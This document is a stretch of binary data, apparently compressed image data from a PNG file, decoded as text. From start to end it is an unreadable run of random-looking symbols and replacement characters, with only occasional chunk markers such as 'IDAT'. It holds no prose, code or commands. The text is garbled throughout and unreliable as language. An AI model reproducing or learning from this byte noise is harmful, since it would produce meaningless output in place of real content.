c�XgWg�H�E!c0M����>C+���g�DOb��[�T�0s�7'~�U���2�R[v�y���e�4�	4�`����cL�Ic�(zB|M��oH{9��ȕ5�4>>^��1�v�/�����.�r���w7��vr"�B�]��%F�{�Z��&S,R��*�/��p��c{q��@3�۫mD�ַ��'��呟���|�?����P܏���=8�������s��[��\:�tK?�GK��K�?b�n!�K)+e^0�'�U`R
8�j�'�]dǤ�
?�f?�bF
�����6�K�O�	���$��iw)]�R��X��I����b!�l�(�Q,G�5^��3��׀����=����h#+�s_���^{B����R=G���קv����ٙl֗&R�s5����u
x�1~[6~�blF�K���N��苖c4�E%���0ПC�����Sd��fSeJ�2�ss��7�5�ߥ��>���KoAڼ���I�aݱ�˨���೨�x75b��D�??�7G��E�7E�[6���9���G
��S�?��돾��d��!��� tuB����p���@���ӤD
{ݘ��#p�~!i�>�7�����v
n+ p�q�V�9$�	që��@�H�.�+�u��1y���+��`a�<H�}����.�Xl���X,����L�e�	@��X��u���{S��Z�{mඥ9���o/���2���,�֩2v{����-����)f4�2xxr��!$iP�\ޭpp����g8s@���i\(2�,��Fz@!Q�4�-�&��&)��I���ȂHd|lH��m��6�M�*�[$j�fJ\�Ҵ{��'�酧 0v�o+���Gw+Dޭ_#�C��QZ|��#�zR��W�2�p�(�s���ϴ��{�lj�Ǹ�V�m:�ln��s������zq�kp%���?#�@�h�m���i
���
�\�A��=㨕13����V�T7<��wK���C&����"H$�T���kB@E�,8���h:�jw�r>�����:��$( ~�O0\���Qޅ�4X�h�ފk6$oT.�e'��M�.qU
(ޣ����V:ͫ>q7.֣i�n_��_��_�����C!��
,fn�=I�5��y
�Z@���Z	?|��,ѷ�"ѷ���3�(4��%@��/�:���F��r�B�p"��Fh��6ے��������H�{��#u��/�q�o�5~��Bp/�"�|����/�WF�2 }�
����2X�-�K�s�s�$�y��O-_#�5a���b�r�ٓet ##��i�/N�@�8|�w�@����Pԡg�K���6��+;�)C���O�~rvjj*4Ek�qӜ�6�KO�<���j׮q�]��_޸�K0� u�����
��� ���kO���H"�X���_���x9
��e�O"�D����MX���t6�9��B��=1����Gao+k�#F_�Kqႍ�M�4�
���'���C�k>�2W���Fr��H �,Ǵ��#Se��d���ޯ@�*�����-���v�e �J޹���S�d@��U�v�w*���FF�X����L:J� � 
�ǵL��p�XZ2fM��XҒ�lH*�%��b��ÑLf>��ʕW�݃��կ~u����1�t(`xw�Km�A��~���R��5�:V:�A�=�@��(u{��~ⴼ�'�u����� c7�_E��R;�A8�R;X^+D,����N
;/�/����M�$��IB~,4�y��.�ί2������5��2���@�h�79Z��|A���;K|$�W�;��!cO�h�(`\�L�8�
����i����7R@�p��u�N�ON����l�w��N��Gm8r%��\�+���ϐ88~��>��k���yM~G(W:~k)�c\`L�7�;y�7�[t�c�ਨ�hZ�'������+q����X�T;��iTZL�'$P�{��h�c���ouƭ�f�h`K)���"�^H9��#��r�x��]�|~	�򠃯s�\�R���*M���@X���~��A�%	���d�t�I�t%dU�$-9����~ReP��r�B��
”��	`{l�\0�����g��Z����oj�w疌߅8�<\^[����W�����/��ۼ���gW��-W������n��
���-�'מ^�����$aO�=E�[X@
Y	�&[���*`~�4�!�.����p�
�#���v]ҧȃ�hz��E�'���5�ͩ���.��������c>���=�&� IDAT�[��@T�D�	��p�hT�:��� 0��i`t�2n����|�a*�X�{\.�҅e��β �=�ݡ���Jߗ��J8Y�Bg	�8M�i���\qr����$�3@!�^���rH�T����f���䀇!ޚ�hk�jo��X��z���Z��]�!�_��!|_���
�KD�WҪ
��>~O��O��cV����Q* �|��Z���&Ic@�;郠T���݂�S�mzx"a��TX�/?"����_u�°=�uA��G6à�X���b�-����_x��۲��4� 'RI�������F#�w�*2�zN@X�A�U�����lV�%?�� ���=߰�>t��A��3B�@_�DM�
�K"�k�^��Z{���/�@�@07��z��|m�Y�{B8��7��~��{���a8��^G���;_�Eޯ?��o��X����*	$�{
���w7�v%��/i+X����S��df���ܣE�BdM���g��>=`*��q4��
�wo7�A���S��C^&@^`�nK�K�^�y�wh�n�.��d�7�;��K[��;�_�:�}�*38�J�"�+=�0�^>?�S���xM�UB�qx���_����3���D"��Zw��@� rƓD.�H��@�]a'�	0J`�P�]�)�r���X�3�����:Sg������ok���7B@m��w��s�B�I,䳙D�B!) ����O�	����v̇�'�gQ��5w,��Y�H��f���xk�7R�p&x�P"�E�ͳ���JlA���e-+�C_Lxtɸfm�@�Y��6���������X�}���]�.Ar	A�P@�3������`��%��!��]Y��/
��|�^�&2u���Ux���tm�n
e�9*)�)}��v��~�݀6��E�5F? BIA{�P�:�V���0��s|�9��2v�r%�ZQ��po����+'�
D�
��3�$|���B�х�/�,����ɎD`ĻMn��b�c��-�v#�Ò�5TQ�&8B!����غƺr�8C�a0�`��pدJ ~���6N���CO�
@R��!��ڃ/n���o 9�3��
�}��b=W�!�����F7�jI�2�h�8�t��u(7�EkMy-hɿz5K�}��	cP:�M(����m��gpPP���N}]Cpօ:��HW~�6�D&��%��h\�g�I�GPj8���|��8XW�CC���e9�۷Kԅs�so���1�
��s&)�2��g���ê;+� �Pxi�n��H}���|2�\#E�"+�Jf�g�r�R�(�̋��"��nJ,%Lp���.#��o�\&#ּ���.Y�"�kõI�e&��>ae�LJ��=����a9r�����h�ui�G��|��/�;	Lw��+��,m?���^-�����/(�Sե�ۖޜKF4Tn#��0�-�`v/��=��F�v)�#�(��!��v�h��? �w~<d��r1�/3�V�L����8��L�][g��in�"��"�R�v���?�z��L!���;�@�ښ�c����z 8[]���P={�zւ<4�+�� [���fB����2�Ȳ#F,��4aս��%�$l]3-�.Y�o�������
��;;g`��_�r.�}��"}]]z��2�п4����%�'�.1��군Bfy���U�ɫ���$,f��~Ԯ	���T��*�\z��/$%ٜ׋��Uf�Ts��ҝL���w�&�"=���G"( j2�Ώ��!X�
�Z;Lk^����Ν_��f�~�@l��=t~��9��.�ޱ'����
�*��u8^n;:����7�����jR2���(wU�"��KG��
zG!�݋�(�a�	 7� 	�i?��Q�6.��lD��B!0)��H �0X�f	�u�lN�����5�G�ɍ]@z����cL�@��NR>~B�X��z�M�דo��*�(�.�J�ٞ�*����X��F�լ�EKPfit9��b�� 7
Cqs�6ol�~#��N�q)
x�8���2�_CX�~DG!�T7��H�`'�Ͷ���x�DwyHa�3@t�r{��-�f���_�k�eN�!�g�� I���ؑ�k�{��.5`zǔ0.a+��c���8N�_����[��jQ@��F�	$��;gFH�p5�w���h�pJ5lH�eK�`}ӓ�iQ@v���e��
W.���b.r�y߹���sn��=6%ɒCh^�2آ�l�O���g�i1H���5��зyC*��T�Τ��ƞȠ��ބ��;�y�w�ԊMؑ*
5������b�����i%��'�@TF(@%���
�X8��s� d��!�ig���\'�ЊI�Y��_mA":�����m��Ka`v�@��Yɿ����Ϥ����U\���da�;G��(���W#��#;���9e�oj� ��w�bz�&�Kh�����D��b��,k���eQ��E�N�+��6���/�|eB��№hi��\6�[6��T_v$]�K\�
�ne[b�F��4�N�!��>��K|��^����;JR�%.��c�����6���v�ܵKR��?C�K�y�Fx�2W���;����EQ���%�LA2�`E>�2����R�k�B������ڒ܁j�V@�!mm�2�[)���e��͘څOQHH�����5����a
�~�vM~`�W7���W�q�쌍�|t���"SK��}�?2��D���iѢ01M���hR�����f|[�"?�Yn�9/�7{�ދo��*��d�p�	{�[��0���߬oDPZ(��dY�^P6WG�ߏ�ҥ��M��8"y[[��[����X������\��%��.��w�Z���
@�H/�_�v�����X���zB�����gaL��#�<nI
ZP�e\A�g`1J�,Z�xM�,&f��s��s\p�.@,�
�6�6���OWW��aS}}���Jb?j��w�m(`/PD��4���񾑙�������?�Σ�A��@��D]
���4������?9)BŷE��U/��f�h�8��,�%|�ь����)�����Ib}R̈́�?��կY��k)5�ʫyu����5�-���BD��4�x)���m��)W�����:� �[�!>��S��6����?G�A٩u�q��r/�~�
U�k��[�e���"yy�BF�f�~e}C�����`X���n̈́$}q��
2�!��~�i�d��0A�� ٳ�?�`�E��L���?[���]0�1�ui��?n��c��5=� �ⅅx��`g_�=�9�]u_uo�z{t�ף�`{;���m�(��3��y��C�'�_�Ǥ���E�{՝(��؄���b���?/f��Ri�R�ɖ��ɖ��>.����P�����Ф�+�e���[K�B�f�G3�G/(̎��ꥊ�����vA�#�V��K�����&�b��߶�+���aW�#g�鲵�}\v�-���
��޵=����p�3~!�����G%��g-��#��
��F��1������H��?���|^(`i@2���6�>�I@��;񱍣��5o$B���ؖ���%�1�W�����/FP� Yb�B<�I"H�pp�{��sz��O��;��
���`��崗�Y�
��@BZ��xp���I�EQ�f��+�Ük�Y��.҇^����o�]���E����M*7S��R���{VvĞ�-�{�(�3����ZrT{�w$� l1s&���c�<zDI �%�_'��*լ�3�vޑ�6��4$M�e��tu�\����!ι`�y�w��N�G��.�ȓ�h��$��e�4�_�AH�5�YՁ��D���!
��0�E7V��ǍW6oD���-�ik���P�	F=��[o�X¦�5t��A�d�t�.�\���_̌;��6����I�_��;���?<���&�%͝�>h�-��4B�R��͊?���]6���iN4��׬��5����5��Cj2���ϴ��;�2� �I�UL��榾c���v|��hِzJ8:� <�s�P�<�:�����R���d�9g(�*a�d�0!��������ʮ��z�5�n�aKi?�v-A��8'�Bd8=!�G�x8��C�������Mz���;��@���B�{T<���1��B���ڷ,3pd�a�!�N��\~3a>�#��m�p����gx"�Xk@]��î����:=�a�o����?A�@�?�l�@���/�G��-`�֘5��H�`�>�6)A�BP�	��N����G�-fGHR2P��Sj"����쯦8Y��t�$�靘kU.�Y=]_ZD1Hc���)����d�n�D�)�?-%�� �\��/���_`o�9����n�CZQ�3h������N�#�B���>~���s�u3�<뻎ɣ���1�”���Ŏ
iD(	�&��|Q�^E	Q�N�P`��Yq�\��/qW��`o�`[�m9b�� ��<��(d˴�=�c\���˻��_nQb��g�|�\�+E/��@���O܉l���k%������×x��q��Lq�YA���>(R2���[T$0p��i"��]JÏ�c�K�S�_��qȤoM�#�k��ʦ�BzM�N􊇉?�^�%uP;��UZa��W���#���՝A��x�LQx!O �[ˤF�rN�…�r]��v��(������%�H>L���]�=�v͎������5�ڟg�0lT�V�[.F.zc��Q�Q�lG"I�*�z���\�e9��aV�"+� 
�,�|�`2�yj�P>D �B�b�I!�?��mƂ}'a��-c[$x�)��ߠ��$�W9�E"�xxD�N=];���+`��%�)�(3űo�
$���C}-������C�����9�$�{,rrK�?w�Y����!,A�{q:u��T"�q�����*
Y0k���`�!G�T0rJ�G/�ߎH�“��8"1�Q��`���	>hȻ��ν��o���v�D���Q�qm6LZ^��!j��s&w<��.�?���2���;�n�i�+!I�%�t5�M���݅�>{$��e�c��d��,�[�:2��`'L���_>`��q0C58�m��[��L��L[�'�E��I�`���a���<<<�0�?�9>84��a�|�)�v�ʗh &�T�4�H8��D�ǰ�-��W���TF��dԣY�N1'wE�:��C�w�p�
�q�1�ʺKG��z��Pea��)i�I�n@��킊3.�*�Gu�jA��ABc2�el��<�E�*q�1�A'v? ��ݣ׼�U�`�z�y,}Y?��3Z�ϓ`2���c��|b	�p1X�&�j���ضwg'���C&اa`���ʧ.T`�NI�Cl�+� ��YK���A*0ǽc�NR@[y@�����GE7*�&c[�1�O`;NN�C�#_��1�'�)��y�HUOO��2��HR,�9��ٹ���N@�L�_���11�gnI�����dw[Ը� �_~��Q!@s1��񵚚\U�5�g��Ls���Y�`F�ts3{x�	�����HZ�iYh�К�d1�G�A�vGE�xX��Q!wZU�H��F�K
5<4�9?���x:M��-�I
��/<��.+d
�~
��%x)����F�o����AH�=��>Y������i�
m��,�a�W�\��G�A����#Y��U�腍름Ѿ�l�Z_�M����	F�#m[^>(s�w���Z�_��`
�"3\
TG�o���
mt�<��#@"p��2c3����`��s���O���Ke}�R�X��JJL�*ț\��&x�Ӹ7�c�?�KE��!QF3�7A�M�[�%wrr���s�l'�JC{�D��r�0�%A�g���	w��M�}��2�����v�jj�,�^��z
@���a���1o$�/��S�����a+����58k$~��AQ���H[H:��D����w��������.uJ/fd���!I����e$�"��; �@�ٖqp!)�>E�۵��d��j;�{nBXE��0���B7��~KZ(��V��@{������l���+��?�R#k��&�_`�@�0`�KgɃ��=���N[f�?WMM�����k���,}:��u~����.�e�e���TS�a��Qy���,�"���h
	G�J׻���u�O{C�j��,�Ng�WTA�躊s�m�hR"z�.Y�uDX�
l�����/�i�����8[
ܣ7�A<��y�S]Y*���M� e�K"�FW8A��Ɂ�w�����|	g�A���I^���P�A�na�^�A�YIokq�`%k�eׂk��cR�m����~��?h�ӵL��̕�A�@Ѿ.m`��|����T��T�&'ӫ��G�e��'��xC�dz��ܛ��C���a�r2�u�ӽ�72M%YT1�x^R��%
1pP{D�ǿhIyb�.hʗ'�ɒK��N*r*�p�w9cŭu��'8RvJt��@ =N��׏�=|(V����lǶ��cE�zjCV}�V�K��~u����W�H�Ean��~��$aX+D�b>����z��&�̩�۶����"�60�Ϋ�p^&��E"��(J��2�n_��:�xQp2XY��
V�^f	$�A2ƛ
�Z �'�����>��'#<(����}3���Ƃ�UA��E�g���>Ҽi�5���W3?/��?O7s�oqBA��~PN��iB?�PK¨�`}"�0wE��Ѐ�v�_���w����Ulj�0�}����v��$�`�T'��\�N�v�xE%��&.e��$-~`�M����:c,Y�%�K�7��n���s�
*��+Y�FU̫�n�D 9X�
o���c��'@��� ���j2-m�Ƥ�mr&\8#�B_�k3��@��������~�`���|��6B�.�#n.G�Lt8zy`��&�$L���d��vw�l_�>�z��n�
}�����2�E�K�`B�f�0Lׇ��`��	��j��Hw�������1�b����M�
�j*Yp����
�qJ7tc��(;��
�����cU��=�(+-122�
/��S�{*�M�:x:����%��x���ko������GĐHvכ��}�����k/�@��׃�>~%�Q�4�fB��R~���+p��:��w!c돏ӀtÐh�d\�C������si0�|j!B�L&�D��,/�z�Fh�q���EkBA�g5�Qsyyy�c8:L�]'��4Q�=��	;�{oj�����Xr�p+�1�����zg�ѽ�1:�~/��1��/҂/Y��]�I$��E���ӗ��%��iNM"�a��d������������9�����y������G%��a�zWs�\�S9�I%�N�$.)#�<}�y�4�r��M�'�z܉����lP�
�딽��%�aSAG�G����ĞL��1��s��������W�3[��!ƜRE�Ye~��	?���Xy�+62�(��$lo��׷��;����p`��6��=�F9��UmE(�t !x;^n��\�"0+�
UU�hiU��g�>�/,_�yy�bc������ۻ��QOhk����Ы/g?|~�L�����a���qi�⒈���� ��
bj�&��晾�GV93MA	�������
��^P���ї�b�Y���A��y�f�s�z›�;������)=�u��V��6̫��p;�W�Or�<�H|�$�4k�ӉM�<|~	��to��Cp�z�fP�ų��&r�>����۳�s IDAT�Pǫ�yçb�$���@�9A�0t��zm#�W(�
�Bb�
�:��Zb�3�6>c�>��`�>��V��	�⌆o���8��������/��s8\Ѻ��G���j�t�n�1��=�ߵ�?��`�b,t8v��í��W��y��W_����3���&�M�yA9B�/;��er1�,��������!Ğ<g�R��״P���{���M��=�l�ɞL��猦��}���j:8rD22b�9�����?|����WAc��@�E��0�&Οk8�Md֒1o}�v�5��d����j�1�O� 7[�y���&��m�n��K]�4�"		�h�vS�T�Ɉ����pj�}�ca4a/a�d�[eU4�U�TZBn�D?�I�4�u��UP��;z\��ǀk����d�j�QW�*p�
/�6>>�=�0�}��){tm��|�jy�ի���O_�~�/��������`UPGK��wA�[a0�!��	�e���5??��X&/�3�a��UF���z)Qp3!ͽ�b�U��UE��(�D �z��7�`���V};�m�^�b����wG���i�渗˼:s�Ջ��7����:�Ɠ�F�pZ�]`����5�>>���ۛe�)T/̍�~X���>i#�zX�ϝ1X��VW+/}D�3���!�]�J2����7�Lx{� "�6)ǵ%䴛P�dB��`#D�[o�:)1�d/)`�~]��g�k6��5ō��#j�6�w��q��с�n��x]��5�8��X84P��Z<@���ȝmߴO�
<x������_�۟�m���!Op��Md��z5*)�K�./���W��	a/��	ԩ�ޕ�K��B�(����N��:�~ݍNّ��a��S1H����hԂ�_�r�̣ٙZS��E��	�������;~��cT�� �!�@�OI�;�> /�@?�V��b�,�b��|b�yw�#�>V���8�e�aey\�ďB`����؛���������[I3�1�7r�-���6��4�~���uZ�w"mF����To���t���m6�Y�.��Y�h
��vG�Q��Uu�t��E�ݟ������һ��nW�����t8�7�nu^�sp�mk*4��է������w�l����wW�|A��{5�dK��N�7H��GXMp�_��7� �����e\�Z�26��{���Y��sL�ʡea�h�i��1/�	�Kz�)LH-�%r�$�:,`���o P����qAz8�[˰#U����i����;��3�6[d�׏�r�H�,!�~c����C/�Kb8�c�H:�W�ㇸ�H�tK�]�hU
�	��.jw���|�+B���w&��9TBl뉐��i$C�w�ZA���Mk���	숡p�k#	L����zT���\@����"���p�\w���!2�tw:v����щ���tM��6��}��}����l��[3�?�ݕ/��wLL�ۧ�����������iF�,(��N��!��<[�̂��M9�æ�Q�
A7��F=S�:Q�"ch���� �a�!���	��;�eO���̣�=N�f�ؠ�_4���V�bu��S{,L�O���2��x#l:��3υ>������'��EzV��L���eVέ�'b\� X��NІ���(`؄�a�%D�8�=���E�zi�n���o�,�"�u�����C
h�Fk\z.*��]��W]�?>p��QUZw�^�p]���HO}�s��F��O�����Շ�<���w�}�r<�9�MYJ���9��I��T5-h�G2>\��}�����%���,������ġ��45���ωAԎ��C�}�UC
eG��AY�\�8�A�@X��9��@�hԐ����<
<͏��b������@f��-�\!ϨU
���!���_���OR0�f�R@
)H԰�J��
Y�a���2�^T�`>��U��F>���y%���y��!U�B�J�-%�M�5S0LX�~@̎�L�O��s0���_c0�)�(�� jp90�Ѣ�~ǀ#�o��
ECc������A�<����?��⋮��'������V�������7~������f�_'�b�!�� H h��e��h?�a�D%p����^�+�`���
}T�����'�^�v!�H
�HN	փ�Tt���50|�^�E0>��[ʑ:�>�._��Y�rU��g���"W�w�@#-�0��*�s�!�|�ܐJ.	�,�5C�6���7�r=N��q��b�Ȝ�����k>`d���r�	 Y`���AvD�$�K�5��q���Z-N���x�{p����w�Jl��]�08�=(ay�w]�o~d�
��BCUw��k����1q�b���\M���յ���7��<7~��7���7�|�����|����������4����w3G�X��>{�PE�sO�Ѝ�W�V��|7�V4�晳�f
�lL��#��i!����g�G_)� ��Ԋ�ꕡ!O��:��ͩ�6d	d<�c�z�s4�t�"p���Y�4�$�I�B�DL�;I�p���V|�F�c��H�U��eϤÚV��
�-*��Y?R�cm24���y�)
�p&�,;�l�6>��^t&���}m-ڑ��^g2m�;E<ÛsZ���8h�:
���fx��E��G�
���uu�:2��8\�E����w��{щ?G]�x�l|�+O����տ}��7����|�vv���@�߉��b7����:&'����+ML]ӊ����u��`H���h��*"87�%'+
�M򍈒���n�V�ԇ��
���ot�������7�Z4�ˏ9��7BI:#�^��Fp��K�	p�y�Z�| �Y���x�1�J�L�a~�,b��*�̭��Mlq�ۂ��?�%9H_�R���H�b�Hk'��,c���������{��ؚ�D:i2ڃ6 &�J�qI!�¼wl<�c��V��1�n�1-��J�@wA�@]�Pi�.�;�5U���߻w����N���{���Ͽ��_}�'�o����������=���\̚^���Ǔ��n�t*#|R��R����9fo�?us�tꓛ,���p��I��ȫ��?8�tc���X�@�5��3,;�z/_��ʩ5�9��:_�?_��F��ף^)�f/1k�O�G���8�tZ�%�{\�cO7?���:	
��@�����'��f�H>�n~I��(���p	�n;�9"&��P�yQ��-���I��@a��"������mҁUoL�-�H���z+�D�J�9�)�%��mEx��syMyUAO
z�š��"z��q�fa��1<�NE��g�⛿���W��������;w�~�@�BbB$udxвeR-�F�d*��A�V��9^}sĚ0Ȳ7�>����}���$�e�o�_׏��#��1Hn!X�����x�D�Ww��]�36ّJ
x���x�n�4�K���g��Ŭ�,�H�����yA�̍���$��g�L��~<c1GȳEF�H
x%�El��VX`Hc_�'�����q�׸dM���|�{M��2����4�"�_~�(�i�I���ݩ�k
+{*
*ѮU�6�R���q�2�>]��$�߷�|�ͫo��`����}|����B��I�lr�ρ�R�λ&��7�A7���4���wS�8��9�sn���Y�����ɂ��ǎe��c�p;~� �X�� gb
Z������!|��?���v��.}��P�
YHr�����v!'ȅҴ@�-���-��𢄐;�P��J�� <VN"��%T��z+��ճ�%
��-��R���������=���d\[�Q��刱6̧��C��p�B�՟1��V��}	EE5U��fA%��}��R��a�\���/�\:�
����m8���_��W�wa��J�,N�q�ڱ�9�Ɍ���g��{c����aF�Z�
x%��4�d�n
q՜�E^��B���f�\dn��eI9) �_g.z������[o]
�y0nt���&x��]�0Y!K���"��	Y,*m���hw7�As�bUKeG�E.kU=L�;��!W�6��W�[6�0aQ9FA0�i�ЇZo��.�����L�����,Ѷ"��̠�(��4W�T����0�tw\�9��/�k���~D]'�'��}���~�9]�7�@��b�2�]�ߗ��J����*�o^�nl���( F�Xb�&x~��"!wHKOCޕ
�5`0GE[�f�k�=@��.s��j�W�����GN��H�e������h�*�	�P�JX!KԒ|�?zF�{��)a��1� ����{�8��%���|�+�m����+z��<����{�|~�x�d�-��&'�^C>}ۤ��jُ���\��-���* _D� �Z��r���2Ll�{�ǿ��W���Ͽ����||��ڭ�ۭ[D_sV�.�|�>�<Bs �BN�P�O��"��+Y��żqc�_���w=t}g�C	�`r�E����y-	��$0���������`{xݟD�|nB(_5��>�~ #_�/��C�C�9���(-�+ę@v�\��/W�Z7�{�p�Q����@�Va8�]���#[	Ŝئ&������m�hĘ0�"����j@Պ����,�M�.,�@����28RUUգ$�/G����||����Ͽ?	���_�)��+\�~^����x��t�Ps�7�a�W)$��`d^���	��M�
|�=n����7�����p�"?��lN"۲�
��5�ԙ]d�'.%rs0
y'%���E}���`~y��t�vh.׀�}�o�K�RD��ڊT��z\)Qg�S�M�8!0T!�h+�����ғj�	N�zm��[&�™`~�㠆`�od$0��%I���[����f4-��Z�Vgȩ��Z�J��0y�X`V���	������`����Gy�0����/����ww���߿��/!�����_}1���z3�p�!y~7� ����,}�d���%=��uCqvC�7�2| �n2~7K�7s�ʼ�lά��V\.D��Q�br��Ф���P/��R�?@li���{�����'=/�rչ�D.��,�*�Yc9�Ym����3�I#�h^��VK-y,����|V@N�D��p�Ͷܶn�t�ɾl���I؍��&��C�,E�YY
8�Y��u
�D���V��%�!,��\�(��0������x����u_\��/a�����ׯ�`�|���(�y�2&��\?d'�&�=��<�F&���7�����xA�2n����f^O��N��J�رlPFT��Z/����9�@zm���A�^KE�y��@�nc�,�Q�y/��S�R@�:�ȟ�5g��Y~�*��2^�h� D*pNms��k �4͛�|1�����no��m�v�C��mAT�Z���vO��#�j�h�:�Y��"|t�z�A��
��z�޽�2/��8�xzz�a�܋/��^Ր��4����"3K%�aa�ҝA���<@�T�O������xx��:��o��9w��J�r�G:���>�iF�1|���U��fia�opfqu�	�=u�i&n�Gۛ�Ղ��T�yu:����s���
UF�^��b*.�WÛ����(�Ӈ�?�@�ȳ�K럦��|����)A��Y�xNZ�+��)�0~*a����L+ ��6��0x�nZG�#aW��p��Zc8�1�I��d��a�{rR:��!�G	��V��ϸ����=~��/`??������|�ެ�*�*��;{��a�_�(%;쐔)��ɹ���wꠇËc}����:�3��f��kq� \Ď��������wC|�9U��_>M�	o��%�����;j������)���VW�+��m\
�v��\�O��q3`�R�dZ�$v.I�##5��S��&��`��!���g^����@F@ȱ����扠�P��W���
>���&��tqb�D�#�D(a���[K�7mj�'vkU�-�ѾᵽK`F���N|e[{$�����gu��������J9p��'u�kjl����暚�ddjz�$
�F�`t!������e��E9��V��
��6�n�(�`��A:���z:H�0r*�<�텑)%ebo��53j�`�I��Gjc�n�8]{�>;{,{L�G��ȕ�gC��k
��h-
�Zrg�q�%n�k�9���\�E�3�gU%8@�`,~���P���V/,L�'�W��X��m0��D�WQ!�v%X�>��	�N!���>~T8�Ⱥ��/��+F�J�bg�q�dt�tk�K�q!�[�2�P�{oݛ{����1D�ۨ��M��SS����5�P�A�
^���]�q���6ݮ^�J!��;ǻ�E��Gh�8���8 ?����4���9�t2�4���)!�B��>lM��
�*S��锬��Ltu8�]���:���AX�>�H�f��tcv3�N3�lm	�^���W8TA�A����F�Ga�_m�3-*����\���
@i��/NH��i�j�d4�K��4�p��<k�����#�p�m��-�]����v�|!E[�<��$��v#�
�ѰP��D�����{���S���w���k~��[��?��*seeAy�m2��]�_}���Ec�?���R���ŋc�����9�/Eҗ!�:�{ґ��@����b�<A�ב��@��51Z�}>�,5��M���t3�[�d�KOvMvtL�"���uk�^�ݢ��c��Wj��f��ys�8)��T��~�+�:��b
��!�>Y��;~.xp��ZS@5�"`�Em�Ua/ȲJ� �m����2
��1Ұ��0���6( �жhO��ʔ0ق����n�7�qؖd����6���a�=���j �[)������=e��+��1�`(�@�o0�'�US
�.����+��r�R>wx��p����￯+���.�o/����L��.!w���.�]��AG
]Ys�T�y13��E�]p� m�i�i+dc�������-`G*7Ňk��|���]z\�3�w�@�п���Y��xR��<tc�A��"��g�ǝ�9q��3�r�._�?��@�[x�z����m�+���Zⷔ���> �B���C�ƾ��8�,����<���>�N��J��a�����HD�h	'�aghɴd�ذ"�N�%�&����3�a^����>�'�7���@�hh4�d���1ȟW4|�J?��O������^�t'�+��������O��������X��V�w�vwr�e')���}��n���Kb:3s��k1��.]׊xs��S��']�i��ƺn�-��.^�c�޸�~kw�pĿ��^H)�)�;���u�Fs^ R����\d�&��~���N���xgl%	$�k�Z �d�=�g-~�
��29ш�_�#���1���M]%X�g��[`*�y$`W���C��b� Z��\[Jx[#d{�LmM�p�֖5d�&}�p�X�6R�����jEhT���?*T&��V8�ݷ߾�c�(��4i
�l@W�⯪�FP��F]�X�UW��w�=���G��ܣ����ng�uo�\��=��tkj栫�&�,+QdV�����Lg@��S$|�?Lu��>F|6�`��x𲸙��1��y���=|Q������V�Ɉ��Y+`#�O� E١��jIy5T�ng��'<��Y�j?�>�2nu�T �{��8�}@��
�Z�?/�c������YeF��VN� \H��	ƹ+$S�)� IDATr{|!�[���?��5�D�5�l�A�8'�-��&��k5.���mt�>~�$M�ow�L��Q�Aޚ{�p�+��J�`���cDb(/��{�+Q��͂���/>���X���bqR�|��T�A��3]�7o>|xc�"�yb�qE�)�9����mL��8E�"�v�a��z�&IY�x���Ç���\�7D�E\C��C;��"-K�s�`����{�8Kܝ8C��>Ϝ����K�>c�� ��`�…�V5�^�IVA�Ǘ��=<�&����EC�~Y}V�����k�P��,��V������$��ΐ3N�%�6�͆�N��j\�	���m��V7?Y}��m����R�=I�5���PLQp6��A�UMo�JK(`�8��{�
��͵�b�}��^d�����`yfj������L��}+�zd�]��k��ۮ1��rr1d��L_W/�Py�|�=���-�d���n�|1����ʻf�07��+�-ц���,�;��Gx�����o����v�'�8#'�BщEw$4�~!����	�k�������x���������^>���l�,5�`wE�>��d��%�d�(���D�|@��R�t.--��v"�nZ�=^��I�z�H����a"�{����g���c���lE0�,LUN,i�������$�
�B!P���/��9]�˵0�z��ERwk;53��һ�bfw�o��4k�i%E�F�t��d*�u�}����C"��kC�gj�\�$��^<��UM
ل��W�oJ�e���}Q�W��Yhhl�q��0$�
4~�������LO�K�'��o��?�~J)�a2lI�a(IE����҂�պ1��|�շ�=�;�������!���z*�̚9�eˈBܗEN_����je��Ix%�Y�D��a�a%��&{�~���	1E�bFc$��}�}p��'OJ䯼_�	@����_�/D+�
��oZ|s���SS�R�hr R#���`����Mk����;��7v0v�Bѱ�]�i�퇇��]<�z8�x�F!Y�L�]��t��"FQ1�5vk�V���i�tu-6͓��`��n��w�<�?�d�#��%�D�vLM����
6���dA%�'�ч�`�����_��t����L�'�6�>�2��q�I	��_ͅp^����#���vd��j�^^�B
�؋@���a<�j?�b^���ҳ�����W�$�
�-0��-h�{�	L|8&S2���"C�}0�`#�$�������'��4���{�J�_����w/T#�W�������
�C��h���4�я��Ӿ�"�RH:���S����6־{�޾{���L��sMM���[|����$+m�Aju������j:=5�F�37�����޿y�|��n�����������4J)+M+�z��eK��N��ז�j�}��g5�;(o�<
��Hr�,?�.b���n��5�1~���!Lx�y��<����jm�J�%�Ad=�U�
����H��m�|l�#6x����<$	��P@.
���)��1}ӏSOX�}����c�t��^�KZ�B�Է|�Y���GF
qSc�@]wA�@�9��]��r�B��$/3O���#�Cz\�%Wn��;<�y�1�p��^���ݩr	ф��|L:݁��q���GQmfN�؛�/���FԈ�<�����W�8I���9�N}��˫��C�����3!�<�@Q��D�(�S$��g�y��8�
�[o���A�p-��:����W��Σ�G�H����_M�'=�+S���rV�,nHȌ��U\D7� ��$��$*q[�z�a�M����$6�Ӓ�nz�hd����b��}p10�"4��6ޥ8D$Uݩw
�$�2kj�N׿�gM���ӟ��څ66�{��n(Z��Qi�.�ʜjP�����\��Edqc�x񐮙ś72{{3��f��{�vオ��ؒ-^M�v�ukw�c�Lb�W�N�f�+<'�v�a�9z��	a��LJ;��dV���0,�w�PFj��ΡNJ�]�)�	
?�N�/�����A":!���[)���—��5T�4��`�~�����Ӈ�N�7�E�׻��	5R�c�3$��7��#���݆q,�P���x|m�|��MJq�0Ύ}t.`K��	gxi)a3-%��F�DY��^(�3ƏܑJM��"^
}ל�]P���""��ݻ�r�o߮�����BSf�#��30��p����<'���_��"�G����ŗ��H�a{�"�s��Z�SM��z3d���#���i� =վ;6u���nע�as�i�
���w�)��M.6s+?/�L-f��	�6�b�4}#��j��C��c�uK�ݐ�Q0!�8T�YVB��Z�%u%�-���.����.���V�6��n���y#
